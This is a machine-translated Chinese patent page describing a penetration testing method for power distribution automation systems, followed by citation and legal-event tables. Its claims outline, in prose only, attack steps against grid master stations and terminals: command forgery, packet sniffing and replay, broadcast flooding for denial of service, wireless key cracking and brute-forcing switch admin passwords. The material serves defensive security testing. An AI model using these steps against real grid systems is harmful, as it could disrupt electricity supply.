SNIFFER ingress-only packet sniffings software capture data link layer, network Layer, transport layer, application layer net obtain host computer transmission data, check command content using protocol analyzer and send address and original Address, the instruction of its main website is changed, forge instruction of the host computer to slave computer, check whether substation receives and perform;Refusing service testing, penetration testing engineer fills the data buffer zone of slave station by sending substantial amounts of broadcasting packet, Slave station can not be normally received the data of main website transmission;In step 3, the concrete methods of realizing that penetration testing is carried out to communication port is:Network test is connected, and penetration testing engineer uses Wired access mode, testing tool accessed by industrial switch Industrial control system network or using wireless access way, by searching wireless network signal, access industrial control system net Network;Wireless network strength is tested, and penetration testing engineer is by the wireless crack tools of BT, to WEP, WPA, WPA2, AES, DES Cracked, obtain encryption key, and then with legal identity access industrial Control System NetWork;The test of network equipment leak is collected, penetration testing engineer, such as the firmware of industrial switch, looks into by checking the network equipment See whether be latest edition, and newest leakage is searched by the safety-related professional forum of www.scadahacker.com industry controls Hole information;Network equipment detection is controlled, penetration testing engineer attempts to log in management by using the mode of weak passwurd and Brute Force Member's account, by obtaining administrator right, is modified to the configuration information of the network equipment;Such as change port information, the network segment every From information, device address, reach and interrupt session, pretend to be main website to test;Monitor message test, penetration testing engineering using SNIFFER ingress-only packet sniffings software capture data link layer, Internet, Transport layer, application layer net obtain terminal transmission data, using specialized protocol analyzer check packet content and send address and Destination address;Change message test, the packet that penetration testing project analysis obtains, change the transmission address of packet, destination address, Data content, then packet is sent again,Refusing service testing, penetration testing engineer fills the data buffer zone of slave station by sending substantial amounts of broadcasting packet, Slave station can not be normally received the data of main website transmission, or restart the network equipment, interrupt BlueDrama, cause network to be refused Service;The electrical power distribution automatization system information security penetration testing method is used for the infiltration of main station system, communication port, distribution network terminal Test, the main station system are communicated to connect by the communication port and the distribution network terminal, and the communication port includes ether Net, GPRS, the distribution network terminal include distribution network terminal DTU, distribution network terminal FTU, distribution network terminal DTU/FTU.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410680264.6A CN104468267B (en) | 2014-11-24 | 2014-11-24 | A kind of electrical power distribution automatization system information security penetration testing method |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410680264.6A CN104468267B (en) | 2014-11-24 | 2014-11-24 | A kind of electrical power distribution automatization system information security penetration testing method |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN104468267A CN104468267A (en) | 2015-03-25 |
| CN104468267B true CN104468267B (en) | 2017-12-12 |
Family
ID=52913674
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201410680264.6A Active CN104468267B (en) | 2014-11-24 | 2014-11-24 | A kind of electrical power distribution automatization system information security penetration testing method |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN104468267B (en) |
Families Citing this family (32)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN105975863A (en) * | 2016-04-27 | 2016-09-28 | 国网天津市电力公司 | Method for evaluating and calculating information security risk of power distribution automation terminal equipment |
| CN106470214B (en) * | 2016-10-21 | 2020-03-06 | 杭州迪普科技股份有限公司 | Attack detection method and device |
| CN106603507A (en) * | 2016-11-29 | 2017-04-26 | 哈尔滨安天科技股份有限公司 | Method and system for automatically completing network security self checking |
| CN106713284A (en) * | 2016-12-02 | 2017-05-24 | 国网浙江省电力公司电力科学研究院 | Industrial control security testing system, and industrial control system |
| CN107134778A (en) * | 2017-07-03 | 2017-09-05 | 湖南工业大学 | Based on internet DC voltage automatic adjusument APF current predictive control methods |
| CN107888598B (en) * | 2017-11-17 | 2020-08-11 | 中广核工程有限公司 | Nuclear power station electrical secondary system information safety risk evaluation system and method |
| CN108173832A (en) * | 2017-12-25 | 2018-06-15 | 四川长虹电器股份有限公司 | Family's Internet of Things application system penetration testing method based on end cloud translocation |
| CN108234525A (en) * | 2018-03-30 | 2018-06-29 | 阜阳职业技术学院 | A kind of information leakage preventing theft protection management system in computer network security |
| CN108665400A (en) * | 2018-04-28 | 2018-10-16 | 湖南城市学院 | A kind of planning of urban and rural management case system |
| CN108737417A (en) * | 2018-05-16 | 2018-11-02 | 南京大学 | A kind of vulnerability checking method towards industrial control system |
| CN108809951A (en) * | 2018-05-16 | 2018-11-13 | 南京大学 | A kind of penetration testing frame suitable for industrial control system |
| CN108769022B (en) * | 2018-05-29 | 2020-05-19 | 浙江大学 | Industrial control system safety experiment system for penetration test |
| CN109040086B (en) * | 2018-08-15 | 2020-11-03 | 广东电网有限责任公司 | Industrial control system DDOS attack simulation method and device |
| CN109561077B (en) * | 2018-11-08 | 2021-01-12 | 广西电网有限责任公司电力科学研究院 | Acquisition terminal communication safety evaluation method and device |
| CN109543301A (en) * | 2018-11-22 | 2019-03-29 | 苏州健雄职业技术学院 | A kind of network security attacks prototype modeling method based on Industry Control |
| CN110033174A (en) * | 2019-03-20 | 2019-07-19 | 烽台科技(北京)有限公司 | A kind of industrial information efficient public security system building method |
| CN110086806B (en) * | 2019-04-26 | 2020-04-14 | 中国南方电网有限责任公司 | Scanning system for plant station equipment system bugs |
| CN110399718B (en) * | 2019-06-04 | 2023-01-20 | 哈尔滨工业大学(威海) | Remote penetration evidence obtaining method for industrial control system |
| CN110221980A (en) * | 2019-06-17 | 2019-09-10 | 南京未来产业大数据研究院有限公司 | Information system and its method for penetration testing and loophole reparation |
| CN110505116A (en) * | 2019-07-30 | 2019-11-26 | 国网陕西省电力公司 | Power information acquisition system and penetration test method, device, readable storage medium storing program for executing |
| CN110677381B (en) * | 2019-08-14 | 2023-05-09 | 奇安信科技集团股份有限公司 | Penetration test method and device, storage medium and electronic device |
| CN110688313B (en) * | 2019-09-26 | 2022-11-18 | 天津津航计算技术研究所 | Fault injection method for software testing under VxWorks operating system |
| CN111157833B (en) * | 2019-10-15 | 2022-09-13 | 国网山东省电力公司电力科学研究院 | Power distribution terminal safety detection system and method based on automatic operation of assembly line |
| CN111026012B (en) * | 2019-11-29 | 2023-01-31 | 安天科技集团股份有限公司 | Method and device for detecting PLC firmware level bugs, electronic equipment and storage medium |
| CN111027074B (en) * | 2019-12-05 | 2022-03-15 | 国网浙江省电力有限公司电力科学研究院 | Vulnerability automatic utilization method and system |
| CN111090864B (en) * | 2019-12-12 | 2022-07-12 | 中国信息安全测评中心 | Penetration test frame system, penetration test platform and penetration test method |
| CN111062040A (en) * | 2019-12-19 | 2020-04-24 | 成都烽创科技有限公司 | Method for determining unknown vulnerability, server and computer readable storage medium |
| CN112398829A (en) * | 2020-11-04 | 2021-02-23 | 国网辽宁省电力有限公司电力科学研究院 | Network attack simulation method and system for power system |
| CN112749086A (en) * | 2021-01-12 | 2021-05-04 | 国网重庆市电力公司营销服务中心 | Method for evaluating and analyzing reliability of metering equipment software |
| CN113934411B (en) * | 2021-11-24 | 2024-11-08 | 南京邮电大学 | Automatic penetration test method for industrial control terminal equipment |
| CN114598509B (en) * | 2022-02-23 | 2023-06-20 | 烽台科技(北京)有限公司 | Method and device for determining vulnerability result |
| CN115801634B (en) * | 2022-12-01 | 2023-06-16 | 北京安帝科技有限公司 | Network test system based on industrial Internet security |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2011086527A1 (en) * | 2010-01-14 | 2011-07-21 | Extrasolution S.R.L. | Apparatus and method for automatic positioning cigarette paper and measuring its permeability |
| CN102468985A (en) * | 2010-11-01 | 2012-05-23 | 北京神州绿盟信息安全科技股份有限公司 | Method and system for performing penetration test on network security equipment |
| CN103903187A (en) * | 2014-03-07 | 2014-07-02 | 国家电网公司 | Fast detection method for potential safety hazards of power distribution automation system information |
Family Cites Families (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104009881B (en) * | 2013-02-27 | 2017-12-19 | 广东电网公司信息中心 | A kind of method and device of system penetration testing |
-
2014
- 2014-11-24 CN CN201410680264.6A patent/CN104468267B/en active Active
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2011086527A1 (en) * | 2010-01-14 | 2011-07-21 | Extrasolution S.R.L. | Apparatus and method for automatic positioning cigarette paper and measuring its permeability |
| CN102468985A (en) * | 2010-11-01 | 2012-05-23 | 北京神州绿盟信息安全科技股份有限公司 | Method and system for performing penetration test on network security equipment |
| CN103903187A (en) * | 2014-03-07 | 2014-07-02 | 国家电网公司 | Fast detection method for potential safety hazards of power distribution automation system information |
Also Published As
| Publication number | Publication date |
|---|---|
| CN104468267A (en) | 2015-03-25 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN104468267B (en) | A kind of electrical power distribution automatization system information security penetration testing method | |
| CN104009881B (en) | A kind of method and device of system penetration testing | |
| Yang et al. | Man-in-the-middle attack test-bed investigating cyber-security vulnerabilities in smart grid SCADA systems | |
| Lin et al. | Cyber attack and defense on industry control systems | |
| CN106828362B (en) | Safety testing method and device for automobile information | |
| CN104363236A (en) | Automatic vulnerability validation method | |
| CN106817363B (en) | Intelligent ammeter abnormity detection method based on neural network | |
| CN111600857A (en) | Account number maintenance system of data center | |
| CN102724208B (en) | For controlling the system and method for the access to Internet resources | |
| CN103903187A (en) | Fast detection method for potential safety hazards of power distribution automation system information | |
| CN105450442A (en) | Network topology checking method and system thereof | |
| CN105827642A (en) | Automatic penetration testing method and system | |
| CN109344624A (en) | Penetration test method, platform, equipment and storage medium based on cloud cooperation | |
| CN113901475A (en) | Fuzzy mining method for input verification vulnerability of industrial control terminal equipment | |
| CN109063486B (en) | Safety penetration testing method and system based on PLC equipment fingerprint identification | |
| CN112906011B (en) | Vulnerability discovery method, testing method, security testing method, related device and platform | |
| CN111510463B (en) | Abnormal behavior recognition system | |
| CN105975863A (en) | Method for evaluating and calculating information security risk of power distribution automation terminal equipment | |
| CN113315767A (en) | Electric power Internet of things equipment safety detection system and method | |
| CN107545636A (en) | Optical cross box smart lock control method, apparatus and its system based on Bluetooth communication | |
| Xiong et al. | A vulnerability detecting method for Modbus-TCP based on smart fuzzing mechanism | |
| CN115361203A (en) | Vulnerability analysis method based on distributed scanning engine | |
| CN108965251A (en) | A kind of safe mobile phone guard system that cloud combines | |
| Jiwen et al. | Cyber security vulnerability assessment for Smart substations | |
| CN112615848B (en) | Vulnerability repair state detection method and system |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| CB03 | Change of inventor or designer information | ||
| CB03 | Change of inventor or designer information |
Inventor after: Chen Liang Inventor after: Shi Wei Inventor after: Tang Ping Inventor after: Xie Hao Inventor after: Li Zhibin Inventor after: Huang Gang Inventor after: Li Xiaohui Inventor after: Gong Chenghu Inventor after: Zhao Jing Inventor after: Wang Kan Inventor after: Liang Ruihong Inventor after: Lin Yongfeng Inventor after: Zhang Guoqiang Inventor after: Yin Bo Inventor after: Wang Jianfeng Inventor after: Xiang Tianchun Inventor after: Li Guodong Inventor after: Li Jie Inventor after: Cui Jie Inventor before: Chen Liang Inventor before: Lin Yongfeng Inventor before: Zhang Guoqiang Inventor before: Tang Ping Inventor before: Li Xiaohui Inventor before: Gong Chenghu |
|
| GR01 | Patent grant | ||
| GR01 | Patent grant |